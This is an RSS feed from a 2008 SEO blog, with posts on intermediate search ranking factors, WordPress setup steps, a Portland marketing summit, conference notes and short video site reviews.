<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	 xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule"  xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>Search Commander Blog - Scott Hendison</title>
	<atom:link href="http://www.pdxtc.com/wpblog/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.pdxtc.com/wpblog</link>
	<description></description>
	<pubDate>Mon, 30 Jun 2008 20:22:57 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5.1</generator>
	<language>en</language>
			<item>
		<title>Beyond the Top 10 SEO Factors</title>
		<link>http://www.pdxtc.com/wpblog/seo/beyond-the-top-10-seo-factors/</link>
		<comments>http://www.pdxtc.com/wpblog/seo/beyond-the-top-10-seo-factors/#comments</comments>
		<pubDate>Mon, 30 Jun 2008 14:58:49 +0000</pubDate>
		<dc:creator>Scott</dc:creator>
		
		<category><![CDATA[SEO]]></category>

		<category><![CDATA[search engine optimization seo101]]></category>

		<category><![CDATA[search marketing]]></category>

		<category><![CDATA[search tips]]></category>

		<guid isPermaLink="false">http://www.pdxtc.com/wpblog/?p=706</guid>
		<description><![CDATA[When I first wrote my article called a proper foundation for search results back in 2004, I admit that really had no idea that there were so many other factors involved in  rankings. That article morphed into an entire SEO 101 section in 2006, but even that isn&#8217;t complete, because things are always changing, [...]]]></description>
			<content:encoded><![CDATA[<p>When I first wrote my article called <a href="http://www.pdxtc.com/200411-seofoundation.htm" target="_blank">a proper foundation for search results</a> back in 2004, I admit that really had no idea that there were so many other factors involved in  rankings. That article morphed into an entire <a href="http://www.pdxtc.com/seo101" target="_blank">SEO 101</a> section in 2006, but even that isn&#8217;t complete, because things are always changing, and there&#8217;s always more to learn.</p>
<p>What follows here are 10 more search ranking factors for the intermediate level SEO, and should be easy to understand.  However, please leave any questions or comments for clarification, or feel free to offer more input if you like&#8230;</p>
<p><strong>11. Robots.txt - </strong><br />
The robots.txt file has become a standard way of giving instructions to the search engines concerning your website, and it&#8217;s also an effective way of telling them where your XML site map is. You can read a lot more <a href="http://www.robotstxt.org/robotstxt.html" target="_blank">about the robots file here</a> but the most important thing to remember, is simply that you need to have one.</p>
<p>If you have a robots.txt file, then your site won&#8217;t be generating 404 errors every time the search engines look for the file, and fewer 404 errors are a good thing.</p>
<p>A typical robots.txt file will show the spiders the location for the XML site map, and then disallow any directories that the site owner doesn&#8217;t want crawled, by either all spiders, or just certain user agents. For example, the following three lines may constitute an entire robots file:</p>
<p>Sitemap: http://www.pdxtc.com/sitemap.xml<br />
User-agent: *<br />
Disallow: /cgi-bin</p>
<p>If you&#8217;re not comfortable with the syntax, here is a free tool for <a href="http://www.sitemapdoc.com/" target="_blank">generating your own Robots file</a>&#8230;</p>
<p><strong>12. Use an XML Sitemap -</strong><br />
The XML site map has become the de facto standard for ensuring all that of your pages get crawled. There are multiple free utilities and websites available for creating your XML site map, like&#8230;<br />
<a href="http://www.xml-sitemaps.com/" target="_blank">http://www.xml-sitemaps.com/</a><br />
<a href="http://www.auditmypc.com/free-sitemap-generator.asp" target="_blank">http://www.auditmypc.com/free-sitemap-generator.asp</a><br />
<a href="http://www.sitemapdoc.com/" target="_blank">http://www.sitemapdoc.com/</a><br />
but you need to keep in mind that this is<em> NOT</em> the same thing as number 7 in my <a href="http://www.pdxtc.com/seo101/scotts-articles/organic-search/top-ten-seo-factors.html" target="_blank">top 10 SEO factors</a>; a static site map.</p>
<p>No human will likely ever look at this file, and instead, you will upload it to your website, and then &#8220;tell&#8221; the search engines that it exists via your robots.txt file, and by manually submitting it through Google&#8217;s Webmaster tools.</p>
<p><strong>13. Permanent 301 Redirects -</strong><br />
The actual file names (pagename.html) should not be changed if it can be avoided, and pages &amp; sections should <strong>NEVER</strong> be deleted entirely from your website  without redirecting spiders and humans to another page on your site.</p>
<p>Missing pages create 404 (page not found) errors, so it&#8217;s important to do a permanent redirect (301) to a similar or corresponding area of your website.</p>
<p>For example if you sell widgets, and a particular model of blue widgets is no longer carried, don&#8217;t just delete the page, but instead created 301 redirect pointing back to your blue widget category. This retains the value of any inbound links you may have obtained for that product, and prevents pages from showing up in the searc hindex that no longer exist.</p>
<p><strong>14. Avoid 404 errors - </strong><br />
This item is more theoretical than fact, but nowadays, (especially with Google), &#8220;trust and credibility&#8221; weigh heavily in your ranking factors. Therefore, it&#8217;s my belief that the search engines do not look favorably upon sites with continual 404 errors.</p>
<p>If you are constantly changing your website, and visitors or spiders are coming up with 404 errors on a regular basis, then it&#8217;s possible (and I believe, likely) that the search engines could see that as &#8220;somewhat flaky&#8221; and lower your ranking.  Again I have no proof here, but to me it&#8217;s logical, and I&#8217;ve always insisted that 404 errors be taken care of when evaluating a website.</p>
<p>There are tools you can use to find broken links, which are the most common source of 404 errors, and my preferred tool of choice is called <a href="http://home.snafu.de/tilman/xenulink.html" target="_blank">Xenu Link Sleuth</a>. You can also look at your own internal stats program to see what 404 errors may be getting generated, and while Google analytics does NOT show you your 404 errors, (how stupid is that?) most likely, your own web hosting internal web statistics do.</p>
<p>It&#8217;s important to track down and eliminate your 404 errors by either fixing the broken link, replacing the missing file(s), or by adding a 301 redirect for the missing URL to another relevant area of your site.</p>
<p><strong>15. DocType statement in .html code -</strong><br />
Some people may think this is silly, but I&#8217;ve seen it help before.  At the very top of your code, I recommend placing a DOCTYPE statement in the HTML code. A DOCTYPE statement in an HTML document declares the document type and level of HTML syntax. While no human visitor will ever see this, the statement is read by Web browsers, software, and even search engine spiders.</p>
<p>Again, this may be more theory than fact, but I can tell you that in my experience, with all other things being equal, a webpage with this statement will outrank a page without it more often than not.</p>
<p>If you care to learn more about the technical aspects of this DOCTYPE statement,  <a href="http://www.december.com/html/tutor/doctype.html" target="_blank">read this</a>, but otherwise feel free to &#8220;view source&#8221; here on my site and see what one looks like.</p>
<p><strong>16. Valid .html code -</strong><br />
Requiring valid HTML code in my opinion is <em>way overrated as a search ranking factor</em>, but it is still worth looking at to catch the biggest errors.</p>
<p>If you really want to drive yourself crazy, and ensure hours and hours of work for your Web developer, then you insist that all of your code is &#8220;valid&#8221; when run through a validator such as the <a href="http://validator.w3.org/" target="_blank">W3C validator tool</a>.</p>
<p>It has been my experience that minor errors showing up here will not affect your ranking, however, I do believe that it is still a good idea to run your site through this validator, so that you can pick up any glaring or dramatic errors.</p>
<p>Most web developers, when shown the list of errors that will undoubtedly appear, will be able to cherry pick their way through them and fix a large quantity.  Sometimes these errors can be major, and fixing them can be done easily, and doing so can improve your search rankings.</p>
<p>Other times these errors can be minor, take hours and hours to track down, and in the end they&#8217;ll have no significant impact on your search rankings.</p>
<p>My recommendation is to verify that major errors get cleaned up, and simply ignore the rest, unless your goal is just to keep a web developer busy digging through the code.</p>
<p><strong>17. Clean URL&#8217;s - </strong><br />
Try to stay away from using long URL strings that contain ugly characters, and make no sense to humans. While the search engines have gotten far better at spidering and indexing them, people are still wary of clicking on them.</p>
<p>Whenever possible, try to use relevant keywords in your page names and directory names, and separate them by dashes, rather than the underscore character.</p>
<p>There is some evidence that doing so can improve your ranking for individual phrases, but there&#8217;s even more evidence showing that you are <em>far more likely to get a click through</em> when someone can tell that the URL is relevant to their search. Furthermore, as people share URLs via emails and bookmarks, &#8220;people friendly&#8221; URL&#8217;s are again, far more likely to get the click.</p>
<p>To illustrate, let me ask you which you of the following two URLs are you more likely to click on, if someone sends you a link, or you see them in a search result?</p>
<p>http://www.domain.com/1743233_uld.asp/cid=7344/?item=4330<br />
or<br />
http://www.domain.com/perfect-shirt-red/</p>
<p><strong>18. Avoid Session ID&#8217;s - </strong><br />
While this is related to the previous item, clean URLs, it&#8217;s worth mentioning on its own. If you have a website that sells something, it&#8217;s likely that your users may be assigned session IDs when they visit for tracking purposes.</p>
<p>A session ID is appended to the URL, and makes a new or temporary set of URLs for the users entire visit. This can be excellent for monitoring site visitor statistics and user behavior, but can be detrimental to your search rankings, if your system is assigning session IDs to the search engine crawlers as well.</p>
<p>You need to ensure that session ID&#8217;s are not being assigned to search engine robots that are visiting your website, and to stop it,  <a href="http://www.seomoz.org/blog/controlling-search-engine-access-with-cookies-session-ids" target="_blank">have your developer read this</a></p>
<p><strong>19. Site Structure - </strong><br />
Your site should have a logical structure, with individual sections or categories for specific types of information and products. Doing so will allow users to easily determine where they are at any given time, it allows the search engine spiders to see a well-organized site,  and it also allows you to develop your site in a &#8220;theme based&#8221; manner when it comes to adding content and developing inbound links.</p>
<p>A quick example would be that if your website sells cars, you have your top-level pages, including home, about us, contact, new cars, and used cars.</p>
<p>Underneath your new cars and used cars categories, you can break it down into brands, years and models, and as you get to specific cars, you would have photos, spec sheets etc about each given car.</p>
<p>Different search marketers call this type of structure something different, but setting things up this way creates a nice <a href="http://www.bruceclay.com/newsletter/volume29/themepartone.html " target="_blank">&#8220;Pyramid&#8221; or &#8220;Theme&#8221; or &#8220;Silo&#8221; structure</a> to your website that lends itself to excellent search rankings.</p>
<p>Using a graphic tool for charting your websites structure is an excellent way to visualize what your site structure looks like, and for that <a href="http://www.mindomo.com" target="_blank">I use Mindomo</a></p>
<p><strong>20. Page file size-</strong><br />
Just like your actual web visitors, the search engines like pages that load quickly, and don&#8217;t make them wait for files &amp; graphics to download. Keep your entire page size as small as possible, and I prefer to see most be under 100k total. The faster they load, the better.</p>
<p>Web developers and graphic artists frequently want to impress visitors and clients with their graphics or their flash files, but great care should be taken to make sure that a balance is achieved between how a page looks, and how long it takes to load.</p>
<p>You have to remember that pages are over 150K are often not even fully cached by the search engines, and Google considers page loading time so important that it has now become <a href="http://adwords.blogspot.com/2008/06/landing-page-load-time-now-affects.html" target="_blank">a factor for Googles Ad Words quality score</a>.</p>
<p>They know that user response to slow loading pages produces a negative experience, so they are actually making you pay more for the slow loading pages, so it&#8217;s logical that this would extent to organic serps, as they try to improve the user experience.</p>
<p><strong>To be continued</strong> -<br />
This certainly isn&#8217;t everything but it&#8217;s a good start, so this series will be continued.</p>
<p>Original content from: <a href="http://www.pdxtc.com/wpblog">Search Commander Blog</a></p>
<p><a href="http://www.pdxtc.com/wpblog/seo/beyond-the-top-10-seo-factors/">Beyond the Top 10 SEO Factors</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.pdxtc.com/wpblog/seo/beyond-the-top-10-seo-factors/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Portland Online Marketing Summit</title>
		<link>http://www.pdxtc.com/wpblog/general-interest/portland-online-marketing-summit/</link>
		<comments>http://www.pdxtc.com/wpblog/general-interest/portland-online-marketing-summit/#comments</comments>
		<pubDate>Thu, 26 Jun 2008 15:45:23 +0000</pubDate>
		<dc:creator>Scott</dc:creator>
		
		<category><![CDATA[General interest]]></category>

		<guid isPermaLink="false">http://www.pdxtc.com/wpblog/?p=702</guid>
		<description><![CDATA[It&#8217;s not often that a world-class Internet marketing event comes to Portland, but on August 5th, I&#8217;ll be at the Online Marketing Summit, taking place here at the Portland zoo.
Whether you&#8217;re looking for best practices in search marketing or e-commerce, analytics and measurement, testing and behavior targeting, or even e-mail marketing, there&#8217;s bound to be [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s not often that a world-class Internet marketing event comes to Portland, but on August 5th, I&#8217;ll be at the <a rel="nofollow" href="http://www.onlinemarketingsummit.com/portland/default.php" target="_blank">Online Marketing Summit</a>, taking place here at the Portland zoo.</p>
<p>Whether you&#8217;re looking for best practices in search marketing or e-commerce, analytics and measurement, testing and behavior targeting, or even e-mail marketing, there&#8217;s bound to be sessions that will educate and enlighten key members of your staff.</p>
<p>If your company is a member of SEMpdx, you can get a discount on attendance too, by visiting the SE <a href="http://www.semportland.com/sempdx-member-discounts/" target="_blank">SEMpdx member discount page</a>.</p>
<p>Take a look at the agenda, and I hope to see you there!</p>
<p style="text-align: center;"><img class="aligncenter" style="margin: 5px; vertical-align: middle; border: 0px;" src="http://www.pdxtc.com/wpblog/wp-content/uploads/2008-oms-agenda.jpg" alt="" width="487" height="1453" /></p>
<p>Original content from: <a href="http://www.pdxtc.com/wpblog">Search Commander Blog</a></p>
<p><a href="http://www.pdxtc.com/wpblog/general-interest/portland-online-marketing-summit/">Portland Online Marketing Summit</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.pdxtc.com/wpblog/general-interest/portland-online-marketing-summit/feed/</wfw:commentRss>
		</item>
		<item>
		<title>SEO Review - PrecisionNorthwest.com</title>
		<link>http://www.pdxtc.com/wpblog/seo-101/seo-review-precisionnorthwestcom/</link>
		<comments>http://www.pdxtc.com/wpblog/seo-101/seo-review-precisionnorthwestcom/#comments</comments>
		<pubDate>Wed, 25 Jun 2008 23:30:59 +0000</pubDate>
		<dc:creator>Scott</dc:creator>
		
		<category><![CDATA[SEO-101]]></category>

		<category><![CDATA[Site Reviews]]></category>

		<guid isPermaLink="false">http://www.pdxtc.com/wpblog/?p=704</guid>
		<description><![CDATA[<div class="revver-video-thumb"><a href="http://www.pdxtc.com/wpblog/seo-101/seo-review-precisionnorthwestcom/" rel="bookmark" title="Watch Video for: SEO Review - PrecisionNorthwest.com"><img src="http://frame.revver.com/frame/170x128/990389.jpg" width="170" /></a></div>This is a regional remodeling and construction firm located in Vancouver Washington. I covered most of the basics from my SEO101 area, and pointed out an error in the robots.txt file. I hope you find this helpful, and if you have any questions at all please be sure to leave them here, so that everyone [...]]]></description>
			<content:encoded><![CDATA[<div class="revver-video-thumb"><a href="http://www.pdxtc.com/wpblog/seo-101/seo-review-precisionnorthwestcom/" rel="bookmark" title="Watch Video for: SEO Review - PrecisionNorthwest.com"><img src="http://frame.revver.com/frame/170x128/990389.jpg" width="170" /></a></div><p>This is a regional remodeling and construction firm located in Vancouver Washington. I covered most of the basics from my SEO101 area, and pointed out an error in the robots.txt file. I hope you find this helpful, and if you have any questions at all please be sure to leave them here, so that everyone may benefit.</p>
<span class='revver-after-video'></span><p>Original content from: <a href="http://www.pdxtc.com/wpblog">Search Commander Blog</a></p>
<p><a href="http://www.pdxtc.com/wpblog/seo-101/seo-review-precisionnorthwestcom/">SEO Review - PrecisionNorthwest.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.pdxtc.com/wpblog/seo-101/seo-review-precisionnorthwestcom/feed/</wfw:commentRss>
	<enclosure url="http://flash.revver.com/player/1.0/player.swf?mediaId=990389&amp;affiliateId=150655" type="application/x-shockwave-flash" length="21789409" ></enclosure><media:player url="http://revver.com/watch/990389/flv/affiliate/150655"></media:player><media:content url="http://flash.revver.com/player/1.0/player.swf?mediaId=990389&amp;affiliateId=150655" duration="187" medium="video" type="application/x-shockwave-flash"></media:content>	</item>
		<item>
		<title>10 Commandments of WordPress</title>
		<link>http://www.pdxtc.com/wpblog/general-interest/10-commandments-of-wordpress/</link>
		<comments>http://www.pdxtc.com/wpblog/general-interest/10-commandments-of-wordpress/#comments</comments>
		<pubDate>Wed, 25 Jun 2008 14:23:41 +0000</pubDate>
		<dc:creator>Scott</dc:creator>
		
		<category><![CDATA[General interest]]></category>

		<category><![CDATA[Wordpress]]></category>

		<category><![CDATA[functionality]]></category>

		<category><![CDATA[fundamental steps]]></category>

		<category><![CDATA[project developments]]></category>

		<category><![CDATA[search engine]]></category>

		<category><![CDATA[wordpress themes]]></category>

		<guid isPermaLink="false">http://www.pdxtc.com/wpblog/?p=701</guid>
		<description><![CDATA[Over the past couple of years, we&#8217;ve become quite dependent upon WordPress because of the versatility of this open source management system, allowing us to do nearly anything we can imagine.
In many cases WordPress can be a good supplement to existing website, allowing users to easily add and manage search engine friendly content without the [...]]]></description>
			<content:encoded><![CDATA[<p>Over the past couple of years, we&#8217;ve become quite dependent upon WordPress because of the versatility of this open source management system, allowing us to do nearly anything we can imagine.</p>
<p>In many cases WordPress can be a good supplement to existing website, allowing users to easily add and manage search engine friendly content without the need of the Web designer.</p>
<p>In other cases, entire project  developments can be done in WordPress, allowing the site to be managed well by non-technical users, with all of the &#8220;SEO&#8221; aspects happening in the background.</p>
<p>In addition to recommending WordPress for clients, we&#8217;ve built dozens of our own affiliate websites on the platform, and have even launched a separate business, <a href="http://www.getwordpressed.com/about/site-matched-themes-wordpress-conversions/" target="_blank">matching WordPress themes to the look and feel</a> of existing sites.</p>
<p>Regardless of what the purpose of the WordPress site is going to be, or what particular plug-ins may help the owner meet those needs, there are some fundamental steps that need to be taken regarding WordPress, and I&#8217;ve outlined them for you here.</p>
<p><strong>1. Host on your own domain</strong><br />
The free version of Wordpress that&#8217;s hosted at Wordpress.com is fine for familiarizing yourself with the functionality of writing posts and trying it out, but I recommend never using it for anything permanent. Here are just a few of the reasons&#8230;</p>
<p>On Wordpress.com hosted sites, you cannot use any plugins, since you have no FTP access. That means that you can&#8217;t use any of the cool things that have been developed, or any of the things that will be developed next.</p>
<p>Even though you own the content, you can&#8217;t monetize the site with ads, since it&#8217;s against WordPress rules.</p>
<p>Most important of all, since you don&#8217;t own the domain, if you one day decide that you&#8217;d like to host on your own domain, you can&#8217;t 301 redirect all of your old URL&#8217;s to your new location.</p>
<p><em>After you install WordPress -</em></p>
<p><strong>2. Change the Admin Password -</strong><br />
Change your administrator password immediately after installation. Sometimes things are just flaky, and the admin email doesn&#8217;t arrive for hours,  and in some cases, it never arrives.</p>
<p>I&#8217;ve also seen servers where the &#8220;lost / change password&#8221; function doesn&#8217;t work either. There is no way you&#8217;re ever going to remember that autgenerated password, so as soon as you see the splash screen showing you a successful install and the password, log right in and change it to a familiar and<br />
secure one that you can remember.</p>
<p><strong>3. Change your permalink structure</strong><br />
Search engines have gotten much better about crawling dynamic URL&#8217;s but it&#8217;s my belief that it&#8217;s still slightly beneficial to have keywords in them.</p>
<p>Not to mention that search engines are far less important than actual humans, aren&#8217;t they?   Let&#8217;s face it - People are more likely to share and click on links that have decent URL&#8217;s, where they can tell what the item is about. For example, which of these two URL&#8217;s would attract your interest?</p>
<p><em>http://www.domain.com/free-superbowl-tickets </em>or<br />
<em> http://www.domain.com/?p=32 ?</em></p>
<p>There are many options for permalinks, but my choice is this&#8230;<br />
%category%/title%</p>
<p>Change by going to options - permalinks - and paste that code into the bottom line.  If you get a message telling you that you need to update your HT access, then you should either do that manually,  or simply change the permissions (CHMOD) for your .htaccess file so it&#8217;s writable.</p>
<p>If for some reason your posts don&#8217;t work after that just returned to the options section and recheck the default box, putting it all back to normal while you troubleshoot.</p>
<p><strong>4. Make your display decisions - </strong><br />
If you&#8217;re using WordPress as a static site, then you need to decide whether you want to display your most recent articles (posts) on the homepage, or you want to have a separate homepage, and display your blog posts elsewhere. These options are chosen in WordPress admin at the settings - reading menu.</p>
<p>By default the homepage will show your latest posts, but if you prefer, you can choose to select a static page as your homepage, and a different page to show your posts.</p>
<p>Of course if you choose this latter option then you&#8217;ll first need to go create a new page as &#8220;Home&#8221;, and probably create a &#8220;news and articles&#8221; page as well, for the blog posts. You can also use the existing About page that comes added by default,  but if you do that, I recommend you change the permalink for it as well.</p>
<p><strong>5. Edit your title tag preferences - </strong><br />
(THIS IS THEME SPECIFIC)<br />
By default, the WordPress titles are sort of weird. To better optimize them, here&#8217;s my solution. Just replace the &lt;title&gt; calls in header.php of your theme with the following code&#8230;</p>
<p>&lt;title&gt;&lt; ?php if ( is_single() ) { ?&gt;&lt; ?php } ?&gt;&lt; ?php wp_title(&#8221;); ?&gt; &lt; ?php if (is_home()) { ?&gt;&lt; ?php } else { ?&gt; | &lt; ?php } ?&gt; &lt; ?php bloginfo(&#8217;name&#8217;); ?&gt; &lt;/title&gt;</p>
<p>This does a couple of things -<br />
a. It places the individual post title at the beginning of the tag</p>
<p>b. It adds  a &#8220;pipe&#8221; character | , or you might prefer to use a dash instead, but either one will have the desired effect of separating the title of the post from the title of the blog.</p>
<p>c. It gets rid of the &gt;&gt;blog archive &gt;&gt; that ends up going into many of the Wordpress URLs</p>
<p><strong>6. Change or delete &#8220;Hello World&#8221; post, permalink, and comment - </strong><br />
The first post that is installed by default for you is called &#8220;Hello World&#8221;. If you do a search on Google for &#8220;Hello World&#8221; or &#8220;Welcome to Wordpress, this is your first post&#8221; and you&#8217;ll see how many people don&#8217;t even do that first part.</p>
<p>I also recommend changing the permalink to that post, which otherwise,  will forever read /hello-world no matter WHAT the actual post title gets changed to. This is easily done on the right of the edit post screen.</p>
<p><strong>7. Change &#8220;Uncategorized&#8221; category &amp; permalink</strong><br />
By default, the name AND permalink to the first category is &#8220;uncategorized&#8221;, so you want to change that, by going to Manage &gt; Categories in the admin panel.  Be sure to choose  a good master category name that will cover your bases for the occasional post you accidentally leave uncategorized, since this will become the default.</p>
<p>You&#8217;ll also want to be certain to edit the permalink at the same time, since that category is going to become a part of the URL.</p>
<p><strong>8. Change &#8220;About&#8221; page title &amp; Permalink</strong><br />
Depending on how you use static pages in your blog, this may not be necessary, but for me, it can&#8217;t be overlooked. Since I frequently use Wordpress for static sites, the first thing I dio is go to the edit &gt; pages - and change the title of &#8220;About&#8221; to Home, and make it the home page. Unless I forever want the permalink to be, /about I change that at the same time to home.</p>
<p><strong>9. Update your ping list</strong><br />
Every time a new page or post is added, WordPress can notify multiple services that you have new content. Doing so will be spidered and visited more frequently improving your rankings. These options can be found in the Admin section,  by going to settings &gt; writing, and scrolling to the bottom.</p>
<p>Instead of using just the one service provided by default, (Pingomatic), I prefer to paste about 100 known and functional ping sites in the list, and I&#8217;ve made my entire <a href="http://www.getwordpressed.com/learning-wordpress/the-big-wordpress-ping-list/" target="_blank">WordPress big ping list</a> available</p>
<p><strong>10. Install your first plugin - BACKUP</strong><br />
This takes under 60 seconds, and can potentially save you a lot of misery. After the blog is going, I like to use the Wordpress automatic backup plug-in, that will email your entire database to you on a regular basis, and even keep a copy on the server too - <a href="http://www.ilfilosofo.com/blog/wp-db-backup" target="_blank">Download it here</a></p>
<p>Some people may argue that blocking or nofollowing your monthly archives (or even your category archives) belongs on this list,  but I think those choices are to be made on an individual basis, and chose not to include them on this list. Personally, I have not blocked either one on my blog, and Google seems to be figuring it out just fine.</p>
<p>It&#8217;s only after all these steps above are done that I&#8217;s recommend beginning to make your plugin choices and installing them.  Since there are literally hundreds of plugins that are rock solid, and will make Wordpress do amazing things, I&#8217;m not going to get into them here.</p>
<p>I will say though, that If you want your site to be found, and you want it to perform well, then you need to do some reading. Talented developers all over the world are creating little miracle plug-ins every day, and you should make your choices wisely, and do lots of homework&#8230;</p>
<p>Original content from: <a href="http://www.pdxtc.com/wpblog">Search Commander Blog</a></p>
<p><a href="http://www.pdxtc.com/wpblog/general-interest/10-commandments-of-wordpress/">10 Commandments of WordPress</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.pdxtc.com/wpblog/general-interest/10-commandments-of-wordpress/feed/</wfw:commentRss>
		</item>
		<item>
		<title>SMX Advanced 2008 - Was it Worth the Trip?</title>
		<link>http://www.pdxtc.com/wpblog/events/smx-advanced-2008-was-it-worth-the-trip/</link>
		<comments>http://www.pdxtc.com/wpblog/events/smx-advanced-2008-was-it-worth-the-trip/#comments</comments>
		<pubDate>Wed, 11 Jun 2008 15:54:17 +0000</pubDate>
		<dc:creator>Scott</dc:creator>
		
		<category><![CDATA[Events]]></category>

		<guid isPermaLink="false">http://www.pdxtc.com/wpblog/?p=700</guid>
		<description><![CDATA[In a word - yes.  I finally just completed my post about attending the SMX Advanced conference in Seattle. It was long overdue, having been nearly a week since I returned, but I have lots of other priorities right now including wrapping up my end of month client reporting, and attending games and practices [...]]]></description>
			<content:encoded><![CDATA[<p>In a word - yes.  I finally just completed my post about attending the <a href="http://searchmarketingexpo.com/advanced/2008/full_agenda.php" target="_blank">SMX Advanced conference</a> in Seattle. It was long overdue, having been nearly a week since I returned, but I have lots of other priorities right now including wrapping up my end of month client reporting, and attending games and practices for both of my kids baseball teams.</p>
<p>I had every intention of posting the wrapup here, but frankly, the SMX blog gets a lot more exposure in the Internet marketing community than I do, and I thought it was pretty good, so that&#8217;s where I&#8217;ve put it.</p>
<p>I&#8217;ve got four or five half finished posts that I would like to get up, along with nearly 20 barely begun ideas sitting in my Wordpress drafts, but I just don&#8217;t seem to have the time. Maybe someday I&#8217;ll have the luxury of writing all day long, but in the meantime, I&#8217;m doing my best&#8230;</p>
<p>Maybe I&#8217;ll get lucky, and <a href="http://www.mattcutts.com/blog/" target="_blank">Matt Cutts</a> will answer these questions I posed in #9&#8230;</p>
<blockquote>
<ol>
<li>Does the age of the anchor text matter? - It&#8217;s long been established practice to review your own inbound link profile, and go back to some of your old partners, and try to get the anchor text changed, but might that be &#8220;resetting the clock&#8221; somehow? Bad idea?</li>
<li>Does changing the URL of an inbound link matter? - If you can somehow actually get a link partner to change the inbound link text, then it&#8217;s probably no more difficult to get them to change the target. Anyone that&#8217;s tried it has seen that help in the past. However, does changing the target URL to a deeper link but would that &#8220;reset the clock&#8221; somehow?</li>
<li>What about changing the domain entirely for that old link? Does that &#8220;reset the clock&#8221; too?</li>
</ol>
</blockquote>
<p>Please head over to the SEMpdx blog, and read my <a href="http://www.semportland.com/events/smx-advanced-2008-top-10-nuggets-of-knowledge/" target="_blank">SMX Advanced Top 10 nuggets of knowledge</a>, and if you like it, please be sure give it a <a href="http://www.sphinn.com" target="_blank">Sphinn</a>!</p>
<p>Original content from: <a href="http://www.pdxtc.com/wpblog">Search Commander Blog</a></p>
<p><a href="http://www.pdxtc.com/wpblog/events/smx-advanced-2008-was-it-worth-the-trip/">SMX Advanced 2008 - Was it Worth the Trip?</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.pdxtc.com/wpblog/events/smx-advanced-2008-was-it-worth-the-trip/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Site Review - Potomac-Writing-Service.com</title>
		<link>http://www.pdxtc.com/wpblog/seo-101/site-review-potomac-writing-servicecom/</link>
		<comments>http://www.pdxtc.com/wpblog/seo-101/site-review-potomac-writing-servicecom/#comments</comments>
		<pubDate>Mon, 19 May 2008 21:00:59 +0000</pubDate>
		<dc:creator>Scott</dc:creator>
		
		<category><![CDATA[SEO-101]]></category>

		<category><![CDATA[Site Reviews]]></category>

		<guid isPermaLink="false">http://www.pdxtc.com/wpblog/?p=693</guid>
		<description><![CDATA[<div class="revver-video-thumb"><a href="http://www.pdxtc.com/wpblog/seo-101/site-review-potomac-writing-servicecom/" rel="bookmark" title="Watch Video for: Site Review - Potomac-Writing-Service.com"><img src="http://frame.revver.com/frame/170x128/897607.jpg" width="170" /></a></div>This is a website for authors, copywriters and editing help, that is missing a couple of the key fundamentals that I outline in my SEO101 section. The review is just 12 minutes long, but provides important information to the site owner.
No Video Responses have been posted yet.Click here to post a video response.Original content from: [...]]]></description>
			<content:encoded><![CDATA[<div class="revver-video-thumb"><a href="http://www.pdxtc.com/wpblog/seo-101/site-review-potomac-writing-servicecom/" rel="bookmark" title="Watch Video for: Site Review - Potomac-Writing-Service.com"><img src="http://frame.revver.com/frame/170x128/897607.jpg" width="170" /></a></div><p>This is a website for authors, copywriters and editing help, that is missing a couple of the key fundamentals that I outline in my <a href="http://pdxtc.com/seo101">SEO101</a> section. The review is just 12 minutes long, but provides important information to the site owner.</p>
<h3>No Video Responses have been posted yet.</h3><p><a href="http://www.pdxtc.com/wpblog/seo-101/site-review-potomac-writing-servicecom/#respond">Click here to post a video response.</a></p><span class='revver-after-video'></span><p>Original content from: <a href="http://www.pdxtc.com/wpblog">Search Commander Blog</a></p>
<p><a href="http://www.pdxtc.com/wpblog/seo-101/site-review-potomac-writing-servicecom/">Site Review - Potomac-Writing-Service.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.pdxtc.com/wpblog/seo-101/site-review-potomac-writing-servicecom/feed/</wfw:commentRss>
	<enclosure url="http://flash.revver.com/player/1.0/player.swf?mediaId=897607&amp;affiliateId=150655" type="application/x-shockwave-flash" length="21789409" ></enclosure><media:player url="http://revver.com/watch/897607/flv/affiliate/150655"></media:player><media:content url="http://flash.revver.com/player/1.0/player.swf?mediaId=897607&amp;affiliateId=150655" duration="187" medium="video" type="application/x-shockwave-flash"></media:content>	</item>
		<item>
		<title>Website Review - slmediasource.com</title>
		<link>http://www.pdxtc.com/wpblog/general-interest/website-review-slmediasourcecom/</link>
		<comments>http://www.pdxtc.com/wpblog/general-interest/website-review-slmediasourcecom/#comments</comments>
		<pubDate>Sat, 17 May 2008 02:59:59 +0000</pubDate>
		<dc:creator>Scott</dc:creator>
		
		<category><![CDATA[General interest]]></category>

		<guid isPermaLink="false">http://www.pdxtc.com/wpblog/?p=691</guid>
		<description><![CDATA[<div class="revver-video-thumb"><a href="http://www.pdxtc.com/wpblog/general-interest/website-review-slmediasourcecom/" rel="bookmark" title="Watch Video for: Website Review - slmediasource.com"><img src="http://frame.revver.com/frame/170x128/892063.jpg" width="170" /></a></div>The owner of this site wants to be found for more &#8220;Second Life&#8221; related search terms, and In the 10 minute video I offer some intermediate level suggestions that may help with overall visibility.
Original content from: Search Commander Blog
Website Review - slmediasource.com
]]></description>
			<content:encoded><![CDATA[<div class="revver-video-thumb"><a href="http://www.pdxtc.com/wpblog/general-interest/website-review-slmediasourcecom/" rel="bookmark" title="Watch Video for: Website Review - slmediasource.com"><img src="http://frame.revver.com/frame/170x128/892063.jpg" width="170" /></a></div><p>The owner of this site wants to be found for more &#8220;Second Life&#8221; related search terms, and In the 10 minute video I offer some intermediate level suggestions that may help with overall visibility.</p>
<span class='revver-after-video'></span><p>Original content from: <a href="http://www.pdxtc.com/wpblog">Search Commander Blog</a></p>
<p><a href="http://www.pdxtc.com/wpblog/general-interest/website-review-slmediasourcecom/">Website Review - slmediasource.com</a></p>
]]></content:encoded>
